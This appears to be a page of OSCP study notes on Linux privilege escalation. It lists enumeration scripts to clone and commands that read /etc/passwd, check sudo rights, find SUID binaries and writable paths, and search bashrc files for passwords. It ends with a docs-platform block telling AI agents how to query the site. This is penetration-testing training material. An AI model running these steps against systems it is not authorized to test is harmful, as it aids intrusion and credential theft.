# Linux Privilege Escalation

## Basic Linux Privilege Escalation

<https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/>

## Automated Enumeration

```
git clone https://github.com/rebootuser/LinEnum.git

./LinEnum.sh
```

```
git clone https://github.com/diego-treitos/linux-smart-enumeration
```

```
git clone https://github.com/pentestmonkey/unix-privesc-check.git

./unix-privesc-check
./unix-privesc-check standard > output.txt
```

## Information Gathering

1. What's the OS? What version? What architecture?

   ```bash
   cat /etc/issue
   cat /etc/*-release
   uname -i
   lsb_release -a (Debian based OSs)
   ```
2. Who are we? Where are we?

   ```bash
   id
   whoami
   pwd
   ```
3. Who uses the box? What users? (And which ones have a valid shell)

   ```bash
   cat /etc/passwd
   grep -vE "nologin|false" /etc/passwd
   ```
4. What's currently running on the box? What active network services are there?

   ```bash
   ps aux
   netstat -antup
   ```
5. What's installed? What kernel is being used?

   ```bash
   dpkg -l (Debian based OSs)
   rpm -qa (CentOS / openSUSE )
   uname -a
   ```

## Check sudo access

[https://gtfobins.github.io](https://gtfobins.github.io/)

```
$ sudo -l
[sudo] password for Hades: 
Matching Defaults entries for pentesterlab on 7358cafc3ebe:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/bash
```

#### Mix cp/chown and chmod

<https://www.adampalmer.me/iodigitalsec/2009/10/03/linux-c-setuid-setgid-tutorial/>

<https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/>

```
sudo -l
Matching Defaults entries for Hades:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp
```

## Check Scheduled Tasks

<https://github.com/DominicBreuker/pspy>

```
ls -lah /etc/cron*
cat /etc/crontab
```

## Readable/Writable Files and Directories

```
find / -writable -type d 2>/dev/null
```

## Check history, bashrc, backup

```
find / -name *history* 2>/dev/null
find / -name *bashrc* -exec grep passwod {} \; 2>/dev/null
```

## Binaries That AutoElevate

```
find / -perm -u=s -type f 2>/dev/null
```

## Unmounted Disks

```
cat /etc/fstab
/bin/lsblk
mount
```

## cat /etc/fstab /bin/lsblk mount

```
lsmod
/sbin/modinfo libata
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://leecybersec.gitbook.io/oscp/privilege-escalation/nix-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.